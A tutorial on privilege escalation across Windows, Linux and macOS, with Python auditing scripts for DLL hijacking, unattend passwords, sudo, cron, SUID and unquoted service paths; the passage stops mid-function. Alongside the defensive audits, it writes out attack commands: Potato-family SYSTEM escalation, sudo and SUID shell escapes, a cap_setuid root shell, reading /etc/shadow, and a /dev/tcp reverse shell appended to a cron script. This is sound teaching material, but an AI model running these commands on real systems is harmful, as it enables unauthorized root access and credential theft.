Master the art of elevating privileges from user to root/system in Windows, Linux, and macOS environments
Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight to gain elevated access to resources that are normally protected from an application or user.
Two main types: vertical (a low-privileged account gains root or SYSTEM) and horizontal (access to another account at the same privilege level). Privilege escalation sits in the middle of a typical attack chain:
1. Initial access (low privileges)
2. Enumeration and discovery
3. Vulnerability identification
4. Exploitation
5. Privilege escalation
6. Persistence and lateral movement
Understanding privilege escalation is crucial for both offensive and defensive security.
Services whose image path contains spaces but is not quoted can be exploited to run arbitrary code as the service account (often SYSTEM). For the unquoted path
C:\Program Files\My Service\service.exe
Windows tries, in order:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Service\service.exe
The first candidate that exists is executed, so write access to any directory earlier in the list wins. Standard users cannot write to C:\ or C:\Program Files\ by default, so the usual target is a third-party install directory with loose ACLs.
MSI packages are installed as SYSTEM, regardless of who runs msiexec, when AlwaysInstallElevated is set to 1 under both of these keys (the HKCU value on its own is not enough):
HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated = 1 (REG_DWORD)
Applications that load a DLL by bare name rather than full path search a fixed list of directories; if the DLL is absent from an earlier location and the attacker can write to one that is searched first, the planted DLL runs inside the application with its privileges. KnownDLLs (ntdll, kernel32, user32 and others) and modules that are already loaded are resolved before any directory search and cannot be hijacked this way. With SafeDllSearchMode enabled (the default), the order is:
1. Application directory
2. System32 directory
3. 16-bit system directory (C:\Windows\System)
4. Windows directory
5. Current directory
6. PATH directories
With SafeDllSearchMode disabled, the current directory moves to second place, ahead of System32.
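The following Python is an added example, not code from the original page: it models the search order above and reports the first directory where an attacker's copy of a DLL would be picked up before the legitimate one. The KnownDLLs subset, the directory names and the exists/writable callables are constructed for offline use; on a live host you would pass os.path.exists and an ACL check (icacls) instead.

```python
"""Model the Windows DLL search order and locate a hijack point (added example)."""
import ntpath

# Subset of the KnownDLLs list: these are mapped from System32 without any
# directory search, so search-order hijacking never applies to them.
KNOWN_DLLS = {"kernel32.dll", "ntdll.dll", "user32.dll", "advapi32.dll",
              "ole32.dll", "gdi32.dll", "shell32.dll"}


def dll_search_order(app_dir, cwd, path_dirs, safe_mode=True,
                     windows=r"C:\Windows"):
    """Directories searched, in order, for a DLL loaded by bare name.

    safe_mode=True is the default Windows behaviour (SafeDllSearchMode on):
    the current directory comes after the system directories.  When the
    registry value is 0 the current directory is searched second.
    """
    system32 = ntpath.join(windows, "System32")
    system16 = ntpath.join(windows, "System")     # 16-bit system directory
    if safe_mode:
        order = [app_dir, system32, system16, windows, cwd]
    else:
        order = [app_dir, cwd, system32, system16, windows]
    return order + list(path_dirs)


def hijack_location(dll_name, order, exists, writable):
    """First directory where an attacker's DLL would be loaded instead of the
    real one, or None when the load cannot be hijacked.

    exists(path) and writable(directory) are callables so the logic runs
    offline; on a host use os.path.exists and an ACL check (icacls).
    """
    if dll_name.lower() in KNOWN_DLLS:
        return None
    for directory in order:
        if writable(directory):
            return directory      # attacker's copy is reached first
        if exists(ntpath.join(directory, dll_name)):
            return None           # legitimate copy is reached first
    return None                   # DLL missing everywhere and nothing writable


if __name__ == "__main__":
    # Constructed scenario: the real version.dll lives in System32 and the
    # application is started from a user-writable Downloads folder.
    app = r"C:\Program Files\App"
    downloads = r"C:\Users\alice\Downloads"
    present = {r"C:\Windows\System32\version.dll"}
    for safe in (True, False):
        where = hijack_location("version.dll",
                                dll_search_order(app, downloads, [], safe),
                                present.__contains__, lambda d: d == downloads)
        print(f"SafeDllSearchMode={'on' if safe else 'off'}: hijack via {where}")
```

With SafeDllSearchMode on, the System32 copy is found before the writable current directory and the load is safe; with it off, the current directory wins. A DLL that exists nowhere (a missing optional dependency) is hijackable from any writable directory on the search path, which is the case Process Monitor's NAME NOT FOUND filter surfaces.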
Scheduled tasks that run as SYSTEM or another privileged account but execute a script or binary the current user can modify, or that live in a directory the user can write to. List the tasks (the "Task To Run" and "Run As User" fields are what matter), then check the ACL of each target with icacls:
schtasks /query /fo LIST /v
Get-ScheduledTask | Get-ScheduledTaskInfo
SeImpersonatePrivilege (and SeAssignPrimaryTokenPrivilege) let a process impersonate the security token of a client that authenticates to it. Service accounts such as IIS application pools and MSSQL hold it by default; the "Potato" family of exploits coerces a SYSTEM process into authenticating to a listener the attacker controls and then impersonates the resulting token. Check with:
whoami /priv
Answer files left behind by unattended installation (Sysprep) may contain local administrator or auto-logon passwords, either in plaintext (PlainText true) or base64-encoded (the encoded form is UTF-16LE of the password with the literal string "Password" appended; this is obfuscation, not encryption). Common locations:
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\System32\sysprep\unattend.xml
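The following Python is an added example, not code from the original page: it parses an answer file, finds AutoLogon, AdministratorPassword and LocalAccount password elements, and reverses the Sysprep encoding for values whose PlainText is false. The sample XML is constructed for the example (the encoded value is generated by the encoder so it round-trips); real answer files carry more attributes but the same element names.

```python
"""Pull credentials out of a Sysprep/unattend answer file (added example)."""
import base64
import binascii
import xml.etree.ElementTree as ET

UNATTEND_NS = "urn:schemas-microsoft-com:unattend"
ENCODING_SUFFIX = "Password"   # Sysprep appends this literal before base64-encoding


def encode_unattend_password(password):
    """Encode the way Setup stores a value whose PlainText is false:
    base64 of UTF-16LE(password + "Password")."""
    return base64.b64encode((password + ENCODING_SUFFIX).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value, plain_text):
    """Recover the password from a <Value>.  A value that does not decode is
    returned as-is (a plaintext value whose PlainText element is missing)."""
    if plain_text:
        return value
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return value
    if decoded.endswith(ENCODING_SUFFIX):
        decoded = decoded[:-len(ENCODING_SUFFIX)]
    return decoded


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def extract_credentials(xml_text):
    """(account, password) pairs from AutoLogon, AdministratorPassword and
    LocalAccount entries, decoded where PlainText is false."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    creds = []
    for elem in root.iter():
        kind = _local(elem.tag)
        if kind not in ("Password", "AdministratorPassword"):
            continue
        value, plain = "", False
        for child in elem:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plain = (child.text or "").strip().lower() == "true"
        if not value:
            continue
        account = "Administrator"          # AdministratorPassword names no user
        if kind == "Password":
            account = "?"
            parent = parent_of.get(elem)
            for sibling in (parent if parent is not None else ()):
                if _local(sibling.tag) in ("Username", "Name") and sibling.text:
                    account = sibling.text.strip()
        creds.append((account, decode_unattend_password(value, plain)))
    return creds


# Constructed sample answer file: an encoded AutoLogon password and a plaintext
# local account password.
SAMPLE_UNATTEND = f"""<unattend xmlns="{UNATTEND_NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{encode_unattend_password("P@ssw0rd!")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>Summer2024</Value>
              <PlainText>true</PlainText>
            </Password>
            <Name>svc_deploy</Name>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for account, password in extract_credentials(SAMPLE_UNATTEND):
        print(f"{account}: {password}")
```

Point the script at the three paths listed above (read them as text and pass the contents to extract_credentials); a value that is neither plaintext nor valid base64 is returned unchanged rather than discarded, so nothing is silently lost.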
Binaries with the SUID bit run with the file owner's effective UID, and SGID binaries with the file group's effective GID, regardless of who executes them; a root-owned SUID binary that can spawn a shell, read arbitrary files or execute its arguments gives root. Enumerate them:
find / -perm -4000 -type f 2>/dev/null   # SUID
find / -perm -u=s -type f 2>/dev/null    # SUID, same search in symbolic form
find / -perm -2000 -type f 2>/dev/null   # SGID
Overly permissive sudo rules (ALL, NOPASSWD, editors, pagers, interpreters, or commands that accept wildcards) let users run commands as root with no effective restriction. List the current user's rules:
sudo -l
Example sudoers entry that is equivalent to a passwordless root shell, because vim can spawn one:
user ALL=(ALL) NOPASSWD: /usr/bin/vim
Cron jobs running as root whose scripts are writable by other users, live in writable directories, or invoke commands by bare name (see PATH hijacking below) can be hijacked. Locations to check:
/etc/crontab
/etc/cron.d/*
/var/spool/cron/crontabs/*   # per-user crontabs, normally readable only by root
crontab -l   # the current user's own jobs
Outdated kernels may contain known local privilege escalation vulnerabilities. Record the exact kernel and distribution version for an exploit suggester, and weigh the risk of crashing the host before running a kernel exploit.
uname -a
cat /proc/version
lsb_release -a
If a privileged script (run via SUID, sudo or cron) invokes a command by bare name rather than absolute path, and the caller controls PATH, a binary of the same name in an attacker-writable directory placed first in PATH runs instead. Note that sudo resets PATH to secure_path by default, so this mainly affects SUID wrappers and scripts that inherit or set their own PATH.
export PATH=/tmp:$PATH
# Create a malicious binary in /tmp named after the command the script calls
Linux capabilities split root's privileges into units that can be attached to a binary; a capability such as cap_setuid on an interpreter is equivalent to root. The +ep suffix means the capability is both permitted and effective when the binary runs (newer libcap prints the same information as path cap_name=ep).
getcap -r / 2>/dev/null
/usr/bin/python3 = cap_setuid+ep
macOS applications may load dynamic libraries (dylibs) from insecure locations, similar to DLL hijacking on Windows. dyld resolves a library's install name using these special tokens, so a writable directory that one of them expands to, or a missing dylib in an rpath entry that is searched before the real one, lets an attacker supply the library:
1. @rpath (expands to each LC_RPATH entry of the binary, in order)
2. @loader_path (directory of the image that contains the load command)
3. @executable_path (directory of the main executable)
4. Fallback to system paths (DYLD_FALLBACK_LIBRARY_PATH, which includes /usr/local/lib and /usr/lib)
Weak (optional) dylibs that do not exist on the system are the classic target. dyld ignores DYLD_* environment variables for restricted binaries (SUID, hardened runtime, or entitled), so the second command below only works against unrestricted targets.
otool -L /path/to/binary
DYLD_PRINT_LIBRARIES=1 /path/to/binary
launchd property lists define daemons (run as root) and agents (run as the user). A LaunchDaemon plist the user can modify, or one whose program path points to a file or directory the user can write, gives root code execution the next time the job loads. launchd refuses daemon plists that are not owned by root or are writable by others, so the practical target is usually the referenced program or its directory. /System/Library/LaunchDaemons/ is protected by SIP and is reference material only.
/Library/LaunchDaemons/
/System/Library/LaunchDaemons/
~/Library/LaunchAgents/
ls -la /Library/LaunchDaemons/
plutil -p /path/to/plist
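The following Python is an added example, not code from the original page: it reads a launchd plist, resolves the program it runs (Program, or the first ProgramArguments entry) and reports the writable-file, writable-directory, missing-program and ownership conditions described above. The demo() helper builds a constructed sample (a plist pointing at a world-writable script) in a temporary directory so the check can be exercised on any OS; the plist keys used are the real launchd ones.

```python
"""Audit a launchd plist for hijackable program paths (added example)."""
import os
import plistlib
import stat
import tempfile


def writable_by_others(st):
    """True when the group or world write bit is set on the inode."""
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_launchd_plist(plist_path, expect_root=True):
    """Return the program a plist launches plus a list of findings.

    expect_root applies the LaunchDaemons rule (plist must be root-owned and
    not writable by others, or launchd rejects it); pass False for a user
    LaunchAgent, which runs as that user anyway.
    """
    findings = []
    with open(plist_path, "rb") as fh:
        data = plistlib.load(fh)
    args = data.get("ProgramArguments") or []
    program = data.get("Program") or (args[0] if args else None)

    pst = os.lstat(plist_path)
    if expect_root and pst.st_uid != 0:
        findings.append("plist not owned by root")
    if writable_by_others(pst):
        findings.append("plist writable by group/others")
    if program is None:
        findings.append("no Program or ProgramArguments key")
        return {"program": None, "run_at_load": False, "findings": findings}

    try:
        st = os.lstat(program)
    except FileNotFoundError:
        st = None
        findings.append("program missing: whoever can create it gets execution")
    if st is not None:
        if writable_by_others(st):
            findings.append("program writable by group/others")
        if stat.S_ISLNK(st.st_mode):
            findings.append("program is a symlink: audit the target too")
    try:
        dst = os.lstat(os.path.dirname(program) or "/")
        # A sticky world-writable directory (like /tmp) does not let other
        # users replace a root-owned file, so only flag non-sticky ones.
        if writable_by_others(dst) and not dst.st_mode & stat.S_ISVTX:
            findings.append("program directory writable: binary can be replaced")
    except FileNotFoundError:
        findings.append("program directory missing")
    return {"program": program,
            "run_at_load": bool(data.get("RunAtLoad", False)),
            "findings": findings}


def demo():
    """Constructed sample: a plist that launches a world-writable script."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "backup.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\necho backup\n")
        os.chmod(script, 0o777)                       # the misconfiguration
        plist = os.path.join(d, "com.example.backup.plist")
        with open(plist, "wb") as fh:
            plistlib.dump({"Label": "com.example.backup",
                           "ProgramArguments": [script, "--nightly"],
                           "RunAtLoad": True}, fh)
        os.chmod(plist, 0o644)
        return audit_launchd_plist(plist, expect_root=False)


if __name__ == "__main__":
    print(demo())
    daemons = "/Library/LaunchDaemons"                # live check on a Mac
    if os.path.isdir(daemons):
        for name in os.listdir(daemons):
            try:
                print(name, audit_launchd_plist(os.path.join(daemons, name))["findings"])
            except (OSError, plistlib.InvalidFileException) as exc:
                print(name, "unreadable:", exc)
```

The directory check skips sticky world-writable directories because a root-owned file in /tmp cannot be renamed or replaced by another user; a non-sticky writable directory lets the attacker swap the binary even when the file itself is root-owned and mode 755.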
Similar to Linux, macOS sudo misconfigurations allow command execution as root. sudo -l works for any user; /etc/sudoers itself is readable only by root.
sudo -l
cat /etc/sudoers
The Transparency, Consent, and Control (TCC) database records which apps have been granted privacy permissions such as Full Disk Access, camera and screen recording; writing an entry grants that access without the user's consent. On current macOS both copies are protected by TCC and SIP: reading or modifying them requires Full Disk Access (or a TCC bypass) even as root, so a TCC.db that an ordinary process can read or write is itself the finding.
~/Library/Application Support/com.apple.TCC/TCC.db
/Library/Application Support/com.apple.TCC/TCC.db
Like Linux, macOS SUID binaries can be exploited if misconfigured.
find / -perm -4000 -type f 2>/dev/null
Loading a kernel extension gives full kernel-level control, but on current macOS it requires root, explicit user approval of the kext, and SIP permitting third-party kexts (plus reduced security mode on Apple silicon); third-party kexts are deprecated in favour of system extensions. kextstat and kextfind are likewise deprecated on macOS 11 and later. Enumerate loaded extensions:
kextstat
kextfind -loaded -b com.apple
Exploit services with image paths containing spaces but no quotes. Find candidates (wmic is deprecated and removed on recent Windows builds; use the PowerShell query there):
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notmatch '\"' -and $_.PathName -match ' '} | Select Name, PathName, StartMode
1. Identify a vulnerable service path
2. Check write permissions (icacls) on each parent directory that precedes a space in the path
3. Place the malicious executable at the first writable candidate (for example C:\Program Files\My.exe)
4. Restart the service, which requires stop/start rights on it, or wait for a reboot if its start mode is Auto
Identify applications vulnerable to DLL hijacking. Robber scans a directory's executables for imported DLLs that resolve from writable locations; Process Monitor shows the actual lookups at run time (it needs administrative rights to load its driver, so run it against a test copy of the application rather than on the target):
robber.exe -d C:\Program Files\VulnerableApp
1. Run procmon.exe
2. Filter: Result is "NAME NOT FOUND"
3. Filter: Path ends with ".dll"
4. Identify writable locations
Leverage SeImpersonatePrivilege to escalate to SYSTEM. Each tool coerces a SYSTEM process into authenticating to the attacker and impersonates the resulting token: JuicyPotato works up to Windows 10 1803 / Server 2016 (later builds block its DCOM trick), PrintSpoofer needs the Print Spooler service running, and GodPotato covers Windows 8 / Server 2012 through Windows 11 / Server 2022. The -p, -c and -cmd arguments name the program that is run as SYSTEM.
whoami /priv | findstr "SeImpersonatePrivilege"
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -t *
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
Abuse SUID binaries to execute commands as the file owner (often root). A shell spawned from a SUID program must keep the effective UID: bash drops it unless started with -p, so set the shell accordingly.
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
# vim/vi (SUID): spawn a privilege-preserving shell
:set shell=/bin/sh\ -p
:shell
# find
find / -exec /bin/bash -p \; -quit
# nmap (older versions)
nmap --interactive
!sh
# Always check GTFOBins for exploitation methods
# https://gtfobins.github.io/
Exploit misconfigured sudo permissions.
sudo -l
# If vim is allowed
sudo vim -c ':!/bin/bash'
# If less is allowed
sudo less /etc/profile
!/bin/bash
# If python is allowed
sudo python -c 'import os; os.system("/bin/bash")'
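The following Python is an added example, not code from the original page: it parses the command block of sudo -l output and labels each rule as any_command (ALL), shell_escape (a GTFOBins editor, pager or interpreter), wildcard (an argument containing *, which sudo matches across / so ../ traversal works) or restricted. The SHELL_ESCAPES set is a constructed subset of GTFOBins and the sample sudo -l text is constructed; the rule syntax and tag names are sudo's own.

```python
"""Triage `sudo -l` output for entries that give a shell (added example)."""
import os
import shlex

# Programs with documented sudo shell escapes on GTFOBins (constructed subset;
# check the site for the full list and the exact escape per program).
SHELL_ESCAPES = {"vim", "vi", "nano", "less", "more", "man", "find", "awk",
                 "python", "python3", "perl", "ruby", "env", "bash", "sh",
                 "tar", "zip", "nmap", "git"}
# Tags sudo prints before a command specification.
SUDO_TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
             "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
             "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}

# Constructed sample of `sudo -l` output for user alice.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (root) NOPASSWD: /bin/cat /var/log/nginx/*, /usr/bin/less /var/log/syslog
    (www-data : www-data) NOPASSWD: ALL
"""


def parse_sudo_l(text):
    """Split the 'may run the following commands' block into entries."""
    entries = []
    in_block = False
    for raw in text.splitlines():
        if "may run the following commands" in raw:
            in_block = True
            continue
        line = raw.strip()
        if not in_block or not line.startswith("("):
            continue
        close = line.index(")")
        runas = line[1:close].strip()
        rest = line[close + 1:].strip()
        tags = set()
        # Consume leading "TAG:" prefixes (NOPASSWD: etc.) before the commands.
        while ":" in rest and rest.split(":", 1)[0].strip() in SUDO_TAGS:
            tag, rest = rest.split(":", 1)
            tags.add(tag.strip())
            rest = rest.strip()
        for spec in rest.split(", "):          # sudo separates commands with ", "
            entries.append({"runas": runas, "tags": tags, "spec": spec.strip()})
    return entries


def assess(spec):
    """Label a command specification by how directly it yields a shell."""
    if spec == "ALL":
        return "any_command"
    try:
        argv = shlex.split(spec)
    except ValueError:
        argv = spec.split()
    if not argv:
        return "restricted"
    binary = os.path.basename(argv[0])
    if binary in SHELL_ESCAPES:
        return "shell_escape"        # editors and pagers escape even with fixed args
    if any("*" in arg for arg in argv[1:]):
        return "wildcard"            # /var/log/nginx/* also matches ../../../etc/shadow
    return "restricted"


def audit_sudo(text):
    """Entries with a nopasswd flag and a risk label."""
    rows = []
    for entry in parse_sudo_l(text):
        rows.append({**entry,
                     "nopasswd": "NOPASSWD" in entry["tags"],
                     "risk": assess(entry["spec"])})
    return rows


if __name__ == "__main__":
    for row in audit_sudo(SAMPLE_SUDO_L):
        print(f"{row['risk']:13} ({row['runas']}) {row['spec']}")
```

Run it on a real host with sudo -l | python3 triage.py after replacing SAMPLE_SUDO_L with sys.stdin.read(); the labels are a triage order, not a verdict: a restricted entry such as systemctl restart nginx still deserves a look at GTFOBins and at whether the unit file it restarts is writable.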
Hijack cron jobs running as root.
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*   # readable only by root
find /etc/cron.* -type f -perm -o+w 2>/dev/null   # world-writable job files
# Append a reverse shell to a writable script that a root cron job runs
# (10.0.0.1:4444 is the attacker's listener)
echo 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' >> /path/to/script.sh
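The following Python is an added example, not code from the original page, serving both the cron section above and the PATH hijacking section: it parses /etc/crontab-style entries (five time fields, user, command, with PATH= assignments honoured), then reports jobs whose script or binary the current user can write, whose directory is writable, or whose command is a bare name resolvable from a writable directory earlier in cron's PATH. The sample crontab and the SAMPLE_WRITABLE / SAMPLE_PRESENT sets describing the filesystem are constructed; on a real host audit_jobs defaults to os.access and os.path.exists.

```python
"""Find hijackable cron jobs: writable targets and PATH hijacks (added example)."""
import os
import shlex

DEFAULT_CRON_PATH = ["/usr/bin", "/bin"]   # cron's PATH when the crontab sets none


def parse_system_crontab(text):
    """Parse /etc/crontab or /etc/cron.d entries (schedule, user, command).
    PATH= assignments apply to the jobs that follow them."""
    path_dirs = list(DEFAULT_CRON_PATH)
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line[0] not in "*@0123456789":          # NAME=value assignment
            key, _, value = line.partition("=")
            if key.strip() == "PATH":
                path_dirs = value.strip().strip('"').split(":")
            continue
        if line.startswith("@"):                    # @reboot, @daily, ...
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:
            parts = line.split(None, 6)             # five time fields, user, command
            if len(parts) < 7:
                continue
            schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        jobs.append({"schedule": schedule, "user": user,
                     "command": command, "path": list(path_dirs)})
    return jobs


def audit_jobs(jobs, writable=lambda p: os.access(p, os.W_OK), exists=os.path.exists):
    """Findings for jobs whose first command the caller can replace or shadow.
    writable/exists are injectable so the check can run against sample data."""
    findings = []
    for job in jobs:
        try:
            argv = shlex.split(job["command"])
        except ValueError:
            argv = job["command"].split()
        if not argv:
            continue
        target = argv[0]
        if "/" in target:                           # absolute or relative path
            if writable(target):
                findings.append((job["user"], target, "target file writable"))
            elif writable(os.path.dirname(target)):
                findings.append((job["user"], target,
                                 "target directory writable: file can be replaced"))
        else:                                       # bare name: resolved via PATH
            for directory in job["path"]:
                if writable(directory):
                    findings.append((job["user"], target,
                                     f"PATH hijack: plant {directory}/{target}"))
                    break
                if exists(os.path.join(directory, target)):
                    break                           # real binary is found first
    return findings


# Constructed sample crontab and a constructed view of the filesystem: what the
# low-privileged user can write, and which files exist on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/alice/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

# m  h  dom mon dow user  command
*    *  *   *   *   root  /opt/scripts/backup.sh
*/5  *  *   *   *   root  cleanup.sh --tmp
@reboot             root  /usr/local/bin/agent --daemon
0    2  *   *   *   alice /home/alice/report.sh
"""
SAMPLE_WRITABLE = {"/opt/scripts/backup.sh", "/home/alice/bin", "/home/alice/report.sh"}
SAMPLE_PRESENT = {"/usr/local/bin/cleanup.sh", "/usr/local/bin/agent",
                  "/opt/scripts/backup.sh"}


def demo():
    jobs = parse_system_crontab(SAMPLE_CRONTAB)
    return audit_jobs(jobs, writable=SAMPLE_WRITABLE.__contains__,
                      exists=SAMPLE_PRESENT.__contains__)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
    if os.path.exists("/etc/crontab"):              # live check on this host
        with open("/etc/crontab") as fh:
            for finding in audit_jobs(parse_system_crontab(fh.read())):
                print(finding)
```

The cleanup.sh job is the PATH case: the crontab puts /home/alice/bin ahead of /usr/local/bin, so a file named cleanup.sh there runs as root at the next five-minute tick. The report.sh hit is reported but only yields alice's own privileges; the user field tells you which findings are worth acting on. Scripts that themselves call commands by bare name need a second look inside the script, which this example does not do.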
Abuse Linux capabilities assigned to binaries.
getcap -r / 2>/dev/null
# cap_setuid - allows changing UID
/usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_dac_read_search - bypasses read permission checks on any file (assuming tar carries it)
tar -cvf shadow.tar /etc/shadow
tar -xvf shadow.tar   # extracts to ./etc/shadow, now readable by you
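The following Python is an added example, not code from the original page, covering both the SUID/SGID enumeration and the capabilities sections: it walks a directory tree for set-id regular files (the equivalent of the find commands above, flagging names that appear on GTFOBins) and parses getcap output in both the older "path = caps+ep" and newer "path caps=ep" formats, highlighting capabilities that amount to root. The GTFOBINS_SUID and DANGEROUS_CAPS sets are constructed subsets, and demo_scan() plants a SUID file in a temporary directory so the walker can be exercised without root.

```python
"""Enumerate SUID/SGID files and flag risky file capabilities (added example)."""
import os
import stat
import tempfile

# Names with documented SUID escapes on GTFOBins (constructed subset).
GTFOBINS_SUID = {"find", "vim", "vi", "nmap", "python", "python3", "perl",
                 "bash", "less", "more", "env", "cp", "tar", "awk", "base64"}
# Capabilities that amount to root when granted to a file (constructed subset).
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace",
                  "cap_sys_module", "cap_chown", "cap_fowner"}


def setid_bits(mode):
    """Which set-id bits a mode carries: 'suid' (run as owner), 'sgid' (run as group)."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("suid")
    if mode & stat.S_ISGID:
        bits.append("sgid")
    return bits


def find_setid_binaries(root="/"):
    """Walk root (without following symlinks) and list regular files with a
    set-id bit, like find / -perm -4000 -o -perm -2000."""
    hits = []
    skip = {"/proc", "/sys", "/dev", "/run"}       # pseudo-filesystems
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = setid_bits(st.st_mode)
            if bits:
                hits.append({"path": path, "bits": bits, "uid": st.st_uid,
                             "gid": st.st_gid, "gtfobins": name in GTFOBINS_SUID})
    return hits


def parse_getcap(text):
    """Parse `getcap -r /` output.  Accepts 'path = cap_a,cap_b+ep' (older libcap)
    and 'path cap_a,cap_b=ep' (libcap 2.41 and later)."""
    results = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if " = " in line:
            path, caps = line.split(" = ", 1)
        else:
            path, _, caps = line.rpartition(" ")
        names = caps.split("=")[0].split("+")[0]       # drop the +ep / =ep flags
        capset = {c.strip() for c in names.split(",") if c.strip()}
        results.append({"path": path, "caps": capset,
                        "dangerous": sorted(capset & DANGEROUS_CAPS)})
    return results


def demo_scan():
    """Constructed sample: a SUID 'find' planted in a temporary tree."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "find")
        open(path, "w").close()
        os.chmod(path, 0o4755)          # rwsr-xr-x
        return find_setid_binaries(d)


if __name__ == "__main__":
    for hit in find_setid_binaries("/usr"):
        flag = "  <- GTFOBins" if hit["gtfobins"] else ""
        print("/".join(hit["bits"]), hit["uid"], hit["path"] + flag)
```

A hit is only interesting when the owner (uid 0 for root) has more privilege than you and the program is one that can be talked into a shell or a file read; pipe real getcap output into parse_getcap to get the same triage for capabilities.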
Practice identifying SUID binaries in a simulated Linux environment by enumerating the binaries with the SUID bit set.
SUID (Set User ID) is a special permission that allows a file to be executed with the privileges of the file owner, rather than the user running it.
-rwsr-xr-x (SUID bit = 's' in owner execute position)
-rwxr-sr-x (SGID bit = 's' in group execute position)
Binaries commonly abused when found with SUID set:
• /usr/bin/find
• /usr/bin/vim
• /usr/bin/nmap (older versions)
• /usr/bin/python
• /usr/bin/perl
• /usr/bin/bash
• /usr/bin/less
• /usr/bin/more
Always reference GTFOBins for SUID exploitation techniques:
https://gtfobins.github.io/
Search for the binary name to find:
• Shell escape sequences
• File read/write methods
• Sudo exploitation
• SUID exploitation
Test Windows service paths for the unquoted path vulnerability.
When Windows encounters an unquoted path with spaces, it tries to execute files in this order:
1. C:\Program.exe
2. C:\Program Files\My.exe
3. C:\Program Files\My App\service.exe
An attacker with write access to C:\ or C:\Program Files\ (denied to standard users by default, so in practice the hit is usually a loosely permissioned third-party directory) can place a malicious executable that gets executed instead.
Always quote service paths containing spaces:
C:\Program Files\My Application\service.exe   (vulnerable)
"C:\Program Files\My Application\service.exe"   (fixed)
Sample paths to evaluate:
C:\Program Files\Vulnerable Service\app.exe   (unquoted, contains spaces: vulnerable)
C:\Custom Apps\My Service\bin\service.exe   (unquoted, contains spaces: vulnerable)
"C:\Program Files\Safe Service\app.exe"   (quoted: safe)
C:\Windows\System32\svchost.exe   (no spaces: safe)
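The following Python is an added example, not code from the original page, covering the unquoted service path description, the exploitation steps and this exercise: it reproduces the CreateProcess lookup (each space-delimited prefix is tried, with .exe appended when the prefix has no extension, until one exists) and lists the file an attacker would plant together with the directory that must be writable for it. The sample paths in the main block are the four from the exercise; checking directory ACLs is left to icacls on the host.

```python
"""Work out what an unquoted Windows service path would execute (added example)."""
import ntpath


def candidate_executables(image_path):
    """Paths CreateProcess tries, in order, for a service image path.

    Unquoted and containing spaces: each space-delimited prefix is tried,
    with .exe appended when the prefix has no extension, until one exists.
    Quoted: only the quoted executable.  Anything after the first token
    that ends in .exe is treated as arguments.
    """
    text = image_path.strip()
    if text.startswith('"'):
        end = text.find('"', 1)
        return [text[1:end] if end > 0 else text[1:]]
    parts = text.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)       # the intended binary; rest are arguments
            break
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def is_vulnerable(image_path):
    """True when Windows would try at least one path other than the real binary."""
    return len(candidate_executables(image_path)) > 1


def hijack_points(image_path):
    """(file to plant, directory that must be writable) for each candidate
    Windows tries before the real executable.  Check each directory with
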